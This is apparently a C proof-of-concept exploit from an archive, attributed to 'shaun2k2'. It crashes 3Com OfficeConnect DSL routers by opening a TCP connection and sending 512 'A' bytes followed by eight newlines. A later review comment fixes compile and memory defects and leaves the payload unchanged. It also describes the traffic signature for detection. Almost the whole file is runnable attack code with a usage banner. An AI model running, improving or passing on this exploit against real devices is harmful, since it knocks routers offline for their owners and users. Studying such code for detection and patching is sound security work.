C/C++ Source or Header
|
2005-02-12
|
2KB
|
74 lines
/* 3com-DoS.c
 *
 * PoC DoS exploit for 3Com OfficeConnect DSL Routers. This PoC exploits the
 * vulnerability documented at:
 * <http://www.securityfocus.com/bid/8248>,
 * discovered by David F. Madrid.
 *
 * Successful exploitation of the vulnerability should cause the router to
 * reboot. It is not believed that arbitrary code execution is possible -
 * check advisory for more information.
 *
 * -shaun2k2
 */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
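/*
 * Entry point: resolve <3com_router>, open one TCP connection to <port>,
 * send a fixed buffer of 512 'A' bytes followed by 8 newline bytes, wait
 * two seconds and close the socket.
 *
 * argv[1]  host name or dotted-quad address of the router
 * argv[2]  TCP port, decimal, 1-65535
 *
 * Returns 0 once the buffer has been handed to the socket; every failure
 * path prints a diagnostic and exits with status -1, as before.
 *
 * Review notes (local defects fixed here, payload unchanged):
 *  - The original buffer was 521 bytes with only 520 initialised and no
 *    terminating NUL, yet its length was taken with strlen(), which read
 *    indeterminate stack memory. The length is now an explicit constant.
 *  - The banner string literal was split across two source lines, which
 *    does not compile; it is rejoined here.
 *  - The port went through atoi() with no validation, so non-numeric or
 *    out-of-range input silently became some other port.
 *  - struct sockaddr_in was only partly initialised, and the connect()
 *    failure path left the socket open.
 *
 * What this looks like on the wire, for detection: a single TCP session
 * to the router's listening port whose client data is 512 consecutive
 * 0x41 bytes followed by eight 0x0a bytes, then a client close roughly
 * two seconds later. Per the file header the affected device is expected
 * to reboot; limiting which hosts can reach that port reduces exposure,
 * and the advisory cited in the header is the reference for fixes.
 */
int main(int argc, char *argv[]) {
    enum { FILL_LEN = 512, TAIL_LEN = 8, PAYLOAD_LEN = FILL_LEN + TAIL_LEN };
    static const char banner[] =
        "3Com OfficeConnect DSL Router DoS exploit by "
        "shaun2k2 - <shaunige@yahoo.co.uk>\n\n";

    if (argc < 3) {
        printf("%s", banner);
        printf("Usage: 3comDoS <3com_router> <port>\n");
        exit(-1);
    }

    /* Strict decimal parse: reject trailing junk and anything outside the
     * valid TCP port range instead of letting atoi() guess. */
    errno = 0;
    char *end = NULL;
    long port = strtol(argv[2], &end, 10);
    if (errno != 0 || end == argv[2] || *end != '\0' ||
        port < 1 || port > 65535) {
        printf("Invalid port: %s\n", argv[2]);
        exit(-1);
    }

    struct hostent *he = gethostbyname(argv[1]);
    if (he == NULL || he->h_addr_list[0] == NULL ||
        he->h_addrtype != AF_INET ||
        he->h_length != (int)sizeof(struct in_addr)) {
        printf("Couldn't resolve %s!\n", argv[1]);
        exit(-1);
    }

    int sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == -1) {
        perror("socket()");
        exit(-1);
    }

    printf("%s", banner);

    /* Zero the whole structure so sin_zero is not left indeterminate, and
     * copy the address bytes rather than dereferencing a cast pointer. */
    struct sockaddr_in dest;
    memset(&dest, 0, sizeof dest);
    dest.sin_family = AF_INET;
    dest.sin_port = htons((unsigned short)port);
    memcpy(&dest.sin_addr, he->h_addr_list[0], sizeof dest.sin_addr);

    printf("[+] Crafting exploit buffer.\n");
    /* Raw byte buffer, not a C string: its length is PAYLOAD_LEN. */
    char explbuf[PAYLOAD_LEN];
    memset(explbuf, 'A', FILL_LEN);
    memset(explbuf + FILL_LEN, '\n', TAIL_LEN);

    if (connect(sock, (struct sockaddr *)&dest, sizeof dest) == -1) {
        perror("connect()");
        close(sock);
        exit(-1);
    }

    printf("[+] Connected...Sending exploit buffer!\n");
    if (send(sock, explbuf, sizeof explbuf, 0) == -1) {
        perror("send()");
        close(sock);
        exit(-1);
    }

    sleep(2);
    close(sock);

    printf("\n[+] Exploit buffer sent!\n");
    return 0;
}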